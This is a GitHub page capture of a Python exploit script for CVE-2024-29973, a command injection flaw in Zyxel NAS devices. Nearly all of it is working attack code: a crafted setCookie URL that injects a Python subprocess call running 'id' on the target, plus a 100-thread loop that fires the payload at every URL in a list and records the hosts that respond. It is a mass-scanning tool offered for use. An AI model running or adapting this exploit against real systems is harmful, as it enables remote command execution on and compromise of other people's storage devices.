-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2024-29973.py
81 lines (63 loc) · 2.32 KB
/
CVE-2024-29973.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
# https://github.com/bigb0x/CVE-2024-29973/blob/main/CVE-2024-29973.py
# Refer to the above URL and make modifications
# Thanks to @bigb0x @momikaa223
# CVE-2024-29973
# Zyxel NAS Command Injection
#!/usr/bin/python3
from random import random
import requests
import threading
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
file_lock = threading.Lock()
# WRITE_URL
def write_to_file(data):
with file_lock:
with open("vul_url.txt", "a+") as file:
file.write(data + "\n")
def run(url):
try:
vul_url = url + """/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23"""
res = requests.get(url=vul_url, proxies={'http':'http://127.0.0.1:7890'},verify=False, timeout=10)
# print(res.text)
if res.status_code == 200 and 'uid' in res.text:
print(f"{url} is vulnerbale")
write_to_file(url)
except Exception as e:
print(e)
return None
max_threads = 100
semaphore = threading.Semaphore(max_threads)
class MyThread(threading.Thread):
def __init__(self, url):
super().__init__()
self.url = url
def run(self):
try:
run(self.url)
except requests.exceptions.RequestException as e:
return None
semaphore.release()
def print_ascii_art():
print("""
_____ _ __ ____ ___ ___ ___ ____ ___ ___ ___ ____ ____
/ ___/ | | / / / __/ ____ |_ | / _ \ |_ | / / / ____ |_ | / _ \ / _ \/_ / |_ /
/ /__ | |/ / / _/ /___/ / __/ / // / / __/ /_ _//___/ / __/ \_, / \_, / / / _/_ <
\___/ |___/ /___/ /____/ \___/ /____/ /_/ /____/ /___/ /___/ /_/ /____/ @momikaa223 @bigb0x @Leviathan
""")
def main():
print_ascii_art()
print("Script is running!")
# OPEN URL FILE
with open("Kelpie.txt", "r") as file:
urls = file.readlines()
threads = []
for url in urls:
semaphore.acquire()
thread = MyThread(url.strip())
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if __name__ == "__main__":
main()